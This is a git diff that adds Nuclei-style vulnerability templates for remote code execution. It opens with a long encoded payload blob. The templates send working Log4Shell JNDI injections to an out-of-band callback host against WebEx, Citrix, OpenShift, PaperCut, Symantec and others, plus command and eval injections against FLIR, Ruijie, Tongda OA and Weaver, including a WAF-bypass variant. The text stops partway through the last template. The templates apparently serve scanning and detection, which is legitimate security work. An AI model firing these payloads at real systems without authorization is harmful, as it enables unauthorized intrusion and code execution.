$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/remote_code_execution/cisco-webex-log4j-rce.yaml b/poc/remote_code_execution/cisco-webex-log4j-rce.yaml new file mode 100644 index 0000000000..ab879def50 --- /dev/null +++ b/poc/remote_code_execution/cisco-webex-log4j-rce.yaml @@ -0,0 +1,66 @@ +id: cisco-webex-log4j-rce + +info: + name: Cisco WebEx - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + Cisco WebEx is susceptible to Log4j JNDI remote code execution. Cisco WebEx provides web conferencing, videoconferencing and contact center as a service applications. + reference: + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"Cisco WebEx" + tags: cve,cve2021,rce,jndi,log4j,cisco,webex,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /orion/login?siteurl=meet HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}}/orion/login?siteurl=meet&rnd=0.1359184728177283 + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded + + type=getFailureTimes&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&bAjax=true + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + part: interactsh_request + + - type: regex + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request + +# digest: 4a0a00473045022042bdc493eb4ec91bbcbcd56ef58972f45032f56c91a340ccc75e523f1953badf022100b70c8852cc0ae3850e5574cc27f06e2eaed76319f53bbb9e1cfe7a4061bd3640:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/citrix-xenapp-log4j-rce.yaml b/poc/remote_code_execution/citrix-xenapp-log4j-rce.yaml new file mode 100644 index 0000000000..20e195261c --- /dev/null +++ b/poc/remote_code_execution/citrix-xenapp-log4j-rce.yaml @@ -0,0 +1,66 @@ +id: citrix-xenapp-log4j-rce + +info: + name: Citrix XenApp - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + Citrix XenApp is susceptible to Log4j JNDI remote code execution. Citrix Virtual Apps is an application virtualization software produced by Citrix Systems that allows Windows applications to be accessed via individual devices from a shared server or cloud system. + reference: + - https://support.citrix.com/article/CTX335705 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: html:"/citrix/xenapp" + tags: cve,cve2021,rce,jndi,log4j,citrix,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /Citrix/XenApp/auth/login.aspx HTTP/1.1 + Host: {{Hostname}} + Cookie: WIClientInfo="clientConnSecure#false"; + Origin: {{RootURL}} + Referer: {{RootURL}}/Citrix/XenApp/auth/login.aspx?CTX_MessageType=WARNING&CTX_MessageKey=NoUsableClientDetected + Content-Type: application/x-www-form-urlencoded + + LoginType=Explicit&user=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + part: interactsh_request + + - type: regex + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request + +# digest: 4b0a00483046022100e171942cb747ce3d9809dcfe3b81a46cbe435f562bbe2f3d83c459f5afaa9cc70221009d87b7b176b4edcaa5c93030a3aa15370540c7b04c1944b606d06772b3047cec:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/flexnet-log4j-rce.yaml b/poc/remote_code_execution/flexnet-log4j-rce.yaml new file mode 100644 index 0000000000..69193dade5 --- /dev/null +++ b/poc/remote_code_execution/flexnet-log4j-rce.yaml @@ -0,0 +1,65 @@ +id: flexnet-log4j-rce + +info: + name: Flexnet - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + Flexnet is susceptible to Log4j JNDI remote code execution. + reference: + - https://community.flexera.com/t5/Revenera-Company-News/Security-Advisory-Log4j-Java-Vulnerability-CVE-2021-4104-CVE/ba-p/216905 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"Flexnet" + tags: cve,cve2021,rce,jndi,log4j,flexnet,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /flexnet/logon.do HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}}/flexnet/logon.do + Content-Type: application/x-www-form-urlencoded + + action=logon&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}&domain=FLEXnet + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + part: interactsh_request + + - type: regex + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request + +# digest: 4a0a0047304502201e397247560dd67fe86cf957ea8e3e2856cfd2606d51a3b3d70f23e75cd73a9b022100a8dce5b3e9cf02c644043a94451cf81a6d846d7e317fa365bd4c03a3aa4ff389:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/flir-ax8-rce.yaml b/poc/remote_code_execution/flir-ax8-rce.yaml new file mode 100644 index 0000000000..f3968a5fc4 --- /dev/null +++ b/poc/remote_code_execution/flir-ax8-rce.yaml @@ -0,0 +1,60 @@ +id: flir-ax8-rce + +info: + name: FLIR-AX8 res.php - Remote Code Execution + author: momika233 + severity: critical + description: | + Remote Command Execution vulnerability in the FLIR-AX8 res.php file, the attacker obtains server permissions after logging in to the background with the default password. + reference: + - https://www.exploit-db.com/exploits/45602 + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E8%8F%B2%E5%8A%9B%E5%B0%94/FLIR-AX8%20res.php%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 2 + fofa-query: app="FLIR-FLIR-AX8" + tags: flir-ax8,rce,exploitdb,iot,sensor,authenticated +variables: + username: admin + password: admin + +http: + - raw: + - | + POST /login/dologin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user_name={{username}}&user_password={{password}} + - | + POST /res.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=node&resource=$(id) + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains_all(to_lower(header_1), 'text/html','phpsessid','showcameraid') + - contains(body_1, 'success') + - status_code_1 == 200 && status_code_2 == 200 + condition: and + + - type: regex + part: body_2 + regex: + - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body_2 + regex: + - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)' + +# digest: 4b0a00483046022100d9a68cb898649a4b2ada6d43c1698cf65a7d1824941994462ffbdb06fea2825c022100e5e4915caac95332342a94a82137128012aad187741b9ebb71f90a1777754f41:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/manage-engine-dc-log4j-rce.yaml b/poc/remote_code_execution/manage-engine-dc-log4j-rce.yaml new file mode 100644 index 0000000000..68f7871503 --- /dev/null +++ b/poc/remote_code_execution/manage-engine-dc-log4j-rce.yaml @@ -0,0 +1,65 @@ +id: manage-engine-dc-log4j-rce + +info: + name: Manage Engine Desktop Central - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + Manage Engine Endpoint Central (formerly Desktop Central) is susceptible to Log4j JNDI remote code execution. Endpoint Central is a Unified Endpoint Management (UEM) & Endpoint protection suite that helps manage and secure various network devices + reference: + - https://pitstop.manageengine.com/portal/en/community/topic/log4j-security-issue + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"ManageEngine Desktop Central" + tags: cve,cve2021,rce,jndi,log4j,manage,engine,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /two_fact_auth HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}}/configurations + Content-Type: application/x-www-form-urlencoded + + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&j_password=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&otpTimeout=7&browserLocale=en_us&cacheNum=4&csrfPreventionSaltForFlashMessage= + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + part: interactsh_request + + - type: regex + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request + +# digest: 4b0a00483046022100d764e7744251fd005646d0bcd9c734f9a2753580ea18e8e00336e6d3a55ba7bb022100be8d729b7e98cdae21d2020d28d8df2df70b424712e5702a59cfa1761fdcd32c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/openshift-log4j-rce.yaml b/poc/remote_code_execution/openshift-log4j-rce.yaml new file mode 100644 index 0000000000..06b115ee26 --- /dev/null +++ b/poc/remote_code_execution/openshift-log4j-rce.yaml @@ -0,0 +1,65 @@ +id: openshift-log4j-rce + +info: + name: OpenShift - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + OpenShift is susceptible to Log4j JNDI remote code execution. OpenShift is a unified platform to build, modernize, and deploy applications at scale. + reference: + - https://access.redhat.com/security/cve/cve-2021-44228 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"OpenShift" + tags: cve,cve2021,rce,jndi,log4j,openshift,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /Login HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}}/login?then=/oauth/authorize?client_id=openshift-web-console&idp=basic&redirect_uri={{BaseURL}}/console/oauth&response_type + Content-Type: application/x-www-form-urlencoded + + then=%2Foauth%2Fauthorize%3Fclient_id%3Dopenshift-web-console%26idp%3Dbasic%26redirect_uri%3D${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}26response_type%3Dcode&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output# + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + part: interactsh_request + + - type: regex + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request + +# digest: 4a0a00473045022100e04b557ecaf5c9bdd9fbed42c94e8a9c41bc2a3063bdf843bde20f58f53de29a0220493cef11b3504b961b48b9a583ac4ecb56d3d918715a4acf09426fa4a60ec300:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/papercut-log4j-rce.yaml b/poc/remote_code_execution/papercut-log4j-rce.yaml new file mode 100644 index 0000000000..2665b9e720 --- /dev/null +++ b/poc/remote_code_execution/papercut-log4j-rce.yaml @@ -0,0 +1,65 @@ +id: papercut-log4j-rce + +info: + name: Papercut - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + Papercut is susceptible to Log4j JNDI remote code execution. Papercut is a print management system. + reference: + - https://www.papercut.com/kb/Main/Log4Shell-CVE-2021-44228#product-status + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"Papercut" + tags: cve,cve2021,rce,jndi,log4j,papercut,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /app HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}}/app + Content-Type: application/x-www-form-urlencoded + + service=direct%2F1%2FHome%2F%24Form&sp=S0&Form0=%24Hidden%240%2C%24Hidden%241%2CinputUsername%2CinputPassword%2C%24Submit%240%2C%24PropertySelection&%24Hidden%240=true&%24Hidden%241=X&inputUsername=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&inputPassword=a&%24Submit%240=Log+in&%24PropertySelection=en + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + + extractors: + - type: kval + kval: + - interactsh_ip + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + + - type: regex + part: interactsh_request + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + +# digest: 4a0a00473045022100e1f717ae6d14de12635cdb28abdf4a0ebd07b6880b8b8bafc11066425dbc7b72022033366236333a7cfb5beb96ae8591c82dddbd5fc8b3c457964828061cc786d216:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/ruijie-nmc-sync-rce.yaml b/poc/remote_code_execution/ruijie-nmc-sync-rce.yaml new file mode 100644 index 0000000000..0c074ed732 --- /dev/null +++ b/poc/remote_code_execution/ruijie-nmc-sync-rce.yaml @@ -0,0 +1,40 @@ +id: ruijie-nmc-sync-rce + +info: + name: Ruijie RG-UAC nmc_sync.php - Remote Code Execution + author: DhiyaneshDk + severity: critical + description: | + There is a command execution vulnerability in the nmc_sync.php interface of Ruijie's RG-UAC unified online behavior management and audit system. An unauthenticated attacker can execute arbitrary commands to control server permissions. + reference: + - https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py + metadata: + verified: true + max-request: 3 + fofa-query: title="RG-UAC登录页面" && body="admin" + tags: rg-uac,file-upload,intrusive,ruijie +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" + +http: + - raw: + - | + GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|echo+{{match_str}}+>+{{random_str}}.txt|cat HTTP/1.1 + Host: {{Hostname}} + + - | + GET /view/systemConfig/management/{{random_str}}.txt HTTP/1.1 + Host: {{Hostname}} + + - | + GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|rm+{{random_str}}.txt|cat HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and +# digest: 4b0a004830460221009a7c5ba834a96f9836326553b14fe11787d36d06478e011a287734e645e964de022100bd2b9ac186ec1a2565bba42a5ad370496877fc519f64a830aae2159ab3b7bf44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/remote_code_execution/symantec-sepm-log4j-rce.yaml b/poc/remote_code_execution/symantec-sepm-log4j-rce.yaml new file mode 100644 index 0000000000..2c06ac05f8 --- /dev/null +++ b/poc/remote_code_execution/symantec-sepm-log4j-rce.yaml @@ -0,0 +1,67 @@ +id: symantec-sepm-log4j-rce + +info: + name: Symantec SEPM - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + Symantec SPEM is susceptible to Log4j JNDI remote code execution. + reference: + - https://support.broadcom.com/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/SYMSA19793 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"Symantec Endpoint Protection Manager" + tags: cve,cve2021,rce,jndi,log4j,symantec,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /console/apps/sepm HTTP/1.1 + Host: {{Hostname}} + Cookie: cookieTest=true; + Origin: {{RootURL}} + Referer: {{RootURL}}/console/apps/sepm + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded + + actionString=%2Fnoupdate%2FSEPMPasswordField_{{field}}%2F&storedActions%5B%5D=%2Ftype%2FSEPMPasswordField_{{field}}%2F${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&__Action=v4&__FastSubmit=true + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + part: interactsh_request + + - type: regex + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request + +# digest: 490a0046304402200fa2ca5045e6f837fba6ea0db9f6febc7565be37982ea64e6cc8ec4efc48620c02206b6de92da70f7d230a90376740999d3b8a8416d5f543e7980c1f19a7eab5f055:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/tongda-getdata-rce.yaml b/poc/remote_code_execution/tongda-getdata-rce.yaml new file mode 100755 index 0000000000..aff30a4d58 --- /dev/null +++ b/poc/remote_code_execution/tongda-getdata-rce.yaml @@ -0,0 +1,37 @@ +id: tongda-getdata-rce + +info: + name: Tongda OA v11.9 getadata - Remote Code Execution + author: SleepingBag945 + severity: critical + description: | + There is an arbitrary command execution vulnerability in the getdata interface of Tongda OA v11.9. An attacker can execute arbitrary commands on the server to control server permissions through the vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20getdata%20%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: app="TDXK-通达OA" + tags: tongda,rce +variables: + num: '999999999' + payload: "echo md5({{num}});" + +http: + - method: GET + path: + - "{{BaseURL}}/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22{{base64(payload)}}%22)))%3B/*&id=19&module=Carouselimage" + + matchers-condition: and + matchers: + - type: word + words: + - '{{md5(num)}}' + - 'pagelimit' + condition: and + + - type: status + status: + - 200 + +# digest: 490a00463044022052a3d076ee938abd5208a2235f1d7fcc0504974f07ceb787a8858a155c963adf022054325d465d3a9c72e37fa962d213f3adaa04076860b3991f75ff809f001e2eeb:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/weaver-ecology-bshservlet-rce.yaml b/poc/remote_code_execution/weaver-ecology-bshservlet-rce.yaml new file mode 100755 index 0000000000..d3a1ef83b1 --- /dev/null +++ b/poc/remote_code_execution/weaver-ecology-bshservlet-rce.yaml @@ -0,0 +1,43 @@ +id: weaver-ecology-bshservlet-rce + +info: + name: Weaver E-Cology BeanShell - Remote Command Execution + author: SleepingBag945 + severity: critical + description: | + Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program. + metadata: + verified: true + max-request: 2 + shodan-query: ecology_JSessionid + fofa-query: app="泛微-协同办公OA" + tags: beanshell,rce,weaver + +http: + - raw: + - | + POST /weaver/bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + bsh.script=print%28%22{{randstr}}%22%29%3B + - | # bypass waf + POST /weaver/bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + %62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b + + matchers-condition: and + matchers: + 